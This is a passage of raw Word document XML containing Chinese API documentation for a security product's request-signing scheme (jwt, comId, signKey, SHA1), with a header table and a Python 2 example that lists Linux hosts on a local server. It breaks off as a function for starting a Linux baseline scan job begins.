          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>response.read</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json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D43A79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc115166081"/>
      <w:bookmarkStart w:id="14" w:name="请求签名"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t>请求签名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="4DD3EA0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>请求业务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，对请求参数有对应的参数签名验证，签名步骤如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6FA78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>通过登录认证步骤获得</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D83B033" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>生成请求的timestamp；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B6FDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于get请求，将请求参数按照参数名排序(自然升序)，将排序后的请求参数及值，和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、timestamp、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>按照以下形式拼接，得到string-to-sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>格式：{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}{key1value1key2value2}{timestamp}{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF5B3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于put/post/delete请求，将body中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>作为参数，按照以下形式拼接，得到string-to-sign</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>格式：{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}{body}{timestamp}{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBE07D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对string-to-sign进行Hash，得到sign字符串。Hash算法使用SHA1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7610177D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>组装请求头，通过http header传递以下参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1508"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="4528"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A6F297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2620ED1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66DF643B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23151263" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="212CFB70" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1596C1B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5391D973" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id，认证返回</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D50006C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>59080851823593e1a80b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12463F0E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B6C71C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60016BB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>时间戳</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="318D3C12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1522037099</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D95222B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BEDBEA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AB6BEFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>签名，计算的签名串</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FC9D8F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>450af724f3e1c6bf8c8f41f715a1b2daf8e2f105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14EBC9C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D4CAC6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517FC583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>认证信息，包含认证的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DC90C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Bearer ${</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34A81B5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E198C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">from __future__ import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># get请求示例-&gt;获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_linux_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/host/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0&amp;size=50" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 即是get请求后面的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>参数键值对</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page': 0, 'size': 50}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># post请求示例-&gt;执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>基线扫描任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>post_execute_linux_baseline_job</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
